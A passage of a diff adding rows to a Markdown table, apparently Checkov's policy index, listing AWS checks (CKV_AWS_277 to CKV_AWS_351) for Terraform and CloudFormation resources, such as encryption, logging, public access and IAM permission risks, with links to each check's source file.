[SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 696 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 697 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | +| 698 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | 
[NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | +| 699 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | +| 700 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | +| 701 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | +| 702 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | +| 703 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | +| 704 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | 
[StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | +| 705 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 706 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 707 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 708 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 709 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 710 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 711 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | 
[IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 712 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 713 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 714 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 715 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 716 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 717 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 718 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 719 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 720 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 721 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 722 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 723 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 724 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | 
[IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 725 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 726 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 727 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 728 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 729 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 730 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 731 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | 
[MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 732 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | +| 733 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | +| 734 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | +| 735 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | +| 736 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | +| 737 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | +| 738 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key 
(CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | +| 739 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | +| 740 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | +| 741 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | +| 742 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | +| 743 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | +| 744 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | +| 745 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | 
[SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | +| 746 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | +| 747 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | +| 748 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | +| 749 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | +| 750 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | +| 751 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | 
[ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | +| 752 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | +| 753 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | +| 754 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | +| 755 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | +| 756 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 757 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 758 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is 
enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
+| 759 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
+| 760 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) |
+| 761 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) |
+| 762 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) |
+| 763 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) |
+| 764 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) |
+| 765 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) |
+| 766 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) |
+| 767 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) |
+| 768 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) |
+| 769 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) |
+| 770 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) |
+| 771 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
+| 772 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
+| 773 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
+| 774 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) |
+| 775 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) |
+| 776 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) |
+| 777 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) |
+| 778 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) |
+| 779 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) |
+| 780 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) |
+| 781 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) |
+| 782 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) |
+| 783 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) |
+| 784 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) |
+| 785 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) |
+| 786 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
+| 787 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
+| 788 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 789 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 790 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 791 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 792 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 793 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 794 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) |
+| 795 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) |
+| 796 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) |
+| 797 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) |
+| 798 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) |
+| 799 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) |
+| 800 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) |
+| 801 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) |
+| 802 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) |
+| 803 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) |
